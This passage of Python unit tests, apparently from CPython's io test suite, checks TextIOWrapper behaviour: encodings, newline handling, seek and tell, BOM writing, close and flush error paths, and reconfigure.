d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
            # try to get a user preferred encoding different from the current
            # locale encoding, to check that TextIOWrapper() uses the current
            # locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
        # Check that the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
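        # (a trailing '\r' cannot be emitted immediately: the next chunk may
        # begin with '\n' and complete a '\r\n' pair, so the wrapper has to
        # hold it back until more data or EOF arrives)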
for encoding in encodings:
            # str.encode() already returns bytes, so no extra conversion is
            # needed
            data = ''.join(input_lines).encode(encoding)
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
            # "utf-16-be" and "utf-16-le" are deliberately skipped here
            for enc in "ascii", "latin-1", "utf-8":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
        # Test seek/tell using the StatefulIncrementalDecoder.
        # Make the test faster by doing smaller seeks.
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
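                # (with the initial I=1/O=1 settings each prefix byte decodes
                # to the two characters "<byte>.", so offset*2 is the length
                # of the prefix in the decoded stream)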
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
            # Check that the BOM is written only once (see issue #1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
    # Read in amounts equal to TextIOWrapper._CHUNK_SIZE, which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
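        # (for example, on a little-endian build 'utf-16' starts the file
        # with the BOM b'\xff\xfe'; appending must not emit a second one)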
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
        # Test that the text file is closed despite the failed flush,
        # and that flush() is called before the file is closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
        # Issue #31271: calling write() when the encoder's encode() returns
        # an invalid (non-bytes) value shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
        # TextIOWrapper will not read the full string, because we truncate
        # it to a multiple of the native int size so that we can construct
        # a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
        # ascii has a specific encodefunc in the C implementation, but
        # utf-8-sig does not.  Make sure that we get rid of the cached
        # encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
        # latin-1 -> utf-8
